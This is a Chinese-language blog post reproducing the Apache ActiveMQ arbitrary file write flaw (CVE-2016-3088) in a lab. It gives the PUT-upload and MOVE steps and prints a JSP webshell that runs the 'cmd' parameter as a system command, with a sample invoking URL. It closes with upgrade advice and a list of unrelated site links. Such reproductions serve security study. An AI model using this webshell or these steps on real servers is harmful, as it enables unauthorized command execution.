Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

发布时间:2024-02-15
服务器
一、漏洞描述
该漏洞出现在fileserver应用中,漏洞原理:activemq中的fileserver服务允许用户通过http put方法上传文件到指定目录。fileserver支持写入文件(不解析jsp),但是支持移动文件(move)我们可以将jsp的文件put到fileserver下,然后再通过move指令移动到可执行目录下访问。
二、漏洞影响版本
apache activemq 5.0.0 – 5.13.2
三、漏洞环境搭建
1、官网下载apache-activemq-5.7.0-bin.tar 下载地址:http://activemq.apache.org/download-archives.html
2、解压
3、启动,进入bin目录下,运行./activemq start
4、浏览器访问http://192.168.10.149:8161/,如下图可以看到成功搭建环境
四、漏洞复现
1、put上传一个jsp的webshell到fileserver目录,下图可以看到成功上传jsp文件
jsp文件内容:
<%@ page import=java.io.*%><% out.print(hello</br>); string strcmd=request.getparameter(cmd); string line=null; process p=runtime.getruntime().exec(strcmd); bufferedreader br=new bufferedreader(new inputstreamreader(p.getinputstream())); while((line=br.readline())!=null){ out.print(line </br>); }%>
2、浏览器访问http://192.168.10.149:8161/fileserver/1.jsp,下图可以看到fileserver目录下的webshell没有被解析,说明fileserver目录没有执行权限
3、利用该版本存在物理路径泄露漏洞,爆一下绝对路径
4、利用move方法将webshell移入admin目录下,如下图所示成功把文件移入到admin目录
5、利用该版本存在的未授权访问漏洞,不用登录,访问http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下图可以看到成功执行命令
五、漏洞防御
1、activemq fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。
———————————————————————————
参考: https://www.secpulse.com/archives/60064.html
总结
以上所述是小编给大家介绍的apache activemq任意文件写入漏洞(cve-2016-3088)复现,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对西部数码网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!
上一个:工程算量如何不重复,不漏项?
下一个:红米手机3s刷机(小米redmi3怎么刷机)

明基投影仪mp515怎么连接电脑(明基mp512怎么连手机)
ssd哪款好,ssd哪个牌子的性能更好更实用
iphone的通知与状态栏在哪里(苹果手机通知栏和状态栏在哪里)
钢材理论重量计算方法有哪些?
六堡茶为什么会那么“耐泡”?
对裁定不服可以申请再审吗
macbookair切换系统的键(mac电脑系统切换快捷键)
好像没有网络为什么服务器会端网了
诺基亚手机没信号怎么回事,为什么我的诺基亚手机老没信号
如何设计准确的直流电源